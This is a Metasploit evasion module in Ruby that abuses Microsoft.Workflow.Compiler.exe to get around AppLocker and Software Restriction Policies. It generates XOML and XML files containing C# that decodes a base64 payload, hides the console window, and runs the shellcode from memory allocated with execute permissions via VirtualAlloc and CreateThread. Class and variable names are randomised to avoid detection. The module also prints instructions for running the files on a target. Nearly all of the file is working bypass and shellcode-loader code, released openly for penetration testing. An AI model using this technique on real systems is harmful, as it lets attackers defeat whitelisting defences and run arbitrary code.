Path: blob/master/modules/evasion/windows/applocker_evasion_workflow_compiler.rb
19592 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Evasion67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Applocker Evasion - Microsoft Workflow Compiler',12'Description' => %q{13This module will assist you in evading Microsoft14Windows Applocker and Software Restriction Policies.15This technique utilises the Microsoft signed binaries16Microsoft.Workflow.Compiler.exe to execute user supplied code.17},18'Author' => [19'Nick Tyrer <@NickTyrer>', # module development20'Matt Graeber' # workflow_compiler bypass research21],22'License' => MSF_LICENSE,23'Platform' => 'win',24'Arch' => [ARCH_X86, ARCH_X64],25'Targets' => [['Microsoft Windows', {}]],26'References' => [27['URL', 'https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb']28]29)30)3132register_options(33[34OptString.new('XOML_FILE', [true, 'Filename for the .xoml file (default: workflow.xoml)', 'workflow.xoml']),35OptString.new('XML_FILE', [true, 'Filename for the .xml file (default: workflow.xml)', 'workflow.xml'])36]37)3839deregister_options('FILENAME')40end4142def build_payload43Rex::Text.encode_base64(payload.encoded)44end4546def obfu47Rex::Text.rand_text_alpha 848end4950def workflow_xoml51esc = build_payload52mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]53<<~HEREDOC54<SequentialWorkflowActivity x:Class="#{mod[0]}" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">55<x:Code><![CDATA[56public class #{mod[1]} : SequentialWorkflowActivity57{58public #{mod[1]}()59{60#{mod[2]}();61}62public static void #{mod[2]}()63{64IntPtr #{mod[3]};65#{mod[3]} = GetConsoleWindow();66ShowWindow(#{mod[3]}, #{mod[4]});67string #{mod[5]} = "#{esc}";68byte[] #{mod[6]} = Convert.FromBase64String(#{mod[5]});69byte[] #{mod[7]} = #{mod[6]};70IntPtr #{mod[8]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[7]}.Length, #{mod[12]}, #{mod[9]});71System.Runtime.InteropServices.Marshal.Copy(#{mod[7]}, 0, #{mod[8]}, #{mod[7]}.Length);72IntPtr #{mod[10]} = IntPtr.Zero;73WaitForSingleObject(CreateThread(#{mod[10]}, UIntPtr.Zero, #{mod[8]}, #{mod[10]}, 0, ref #{mod[10]}), #{mod[11]});74}75private static Int32 #{mod[12]}=0x1000;76private static IntPtr #{mod[9]}=(IntPtr)0x40;77private static UInt32 #{mod[11]} = 0xFFFFFFFF;78[System.Runtime.InteropServices.DllImport("kernel32")]79private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);80[System.Runtime.InteropServices.DllImport("kernel32")]81private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr #{mod[10]});82[System.Runtime.InteropServices.DllImport("kernel32")]83private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);84[System.Runtime.InteropServices.DllImport("user32.dll")]85static extern bool ShowWindow(IntPtr #{mod[3]}, int nCmdShow);86[System.Runtime.InteropServices.DllImport("Kernel32")]87private static extern IntPtr GetConsoleWindow();88const int #{mod[4]} = 0;89}90]]></x:Code>91</SequentialWorkflowActivity>92HEREDOC93end9495def workflow_xml96<<~HEREDOC97<?xml version="1.0" encoding="utf-8"?>98<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">99<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">100<d2p1:string>#{datastore['XOML_FILE']}</d2p1:string>101</files>102<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">103<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />104<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />105<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>106<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />107<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />108<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>109<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>110<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>111<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />112<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />113<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>114<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />115<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>116<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>117<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />118<d2p1:checkTypes>false</d2p1:checkTypes>119<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>120<d2p1:compilerOptions i:nil="true" />121<d2p1:generateCCU>false</d2p1:generateCCU>122<d2p1:languageToUse>CSharp</d2p1:languageToUse>123<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />124<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />125<d2p1:mtInfo i:nil="true" />126<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />127</parameters>128</CompilerInput>129HEREDOC130end131132def file_format_filename(name = '')133name.empty? ? @fname : @fname = name134end135136def create_files137f1 = datastore['XOML_FILE'].empty? ? 'workflow.xoml' : datastore['XOML_FILE']138f1 << '.xoml' unless f1.downcase.end_with?('.xoml')139f2 = datastore['XML_FILE'].empty? ? 'workflow.xml' : datastore['XML_FILE']140f2 << '.xml' unless f2.downcase.end_with?('.xml')141xoml_file = workflow_xoml142xml_file = workflow_xml143file_format_filename(f1)144file_create(xoml_file)145file_format_filename(f2)146file_create(xml_file)147end148149def instructions150print_status "Copy #{datastore['XOML_FILE']} and #{datastore['XML_FILE']} to the target"151if payload.arch.first == ARCH_X86152print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\Microsoft.Workflow.Compiler.exe #{datastore['XML_FILE']} #{Rex::Text.rand_text_alpha 3}"153else154print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\Microsoft.Workflow.Compiler.exe #{datastore['XML_FILE']} #{Rex::Text.rand_text_alpha 3}"155end156end157158def run159create_files160instructions161end162end163164165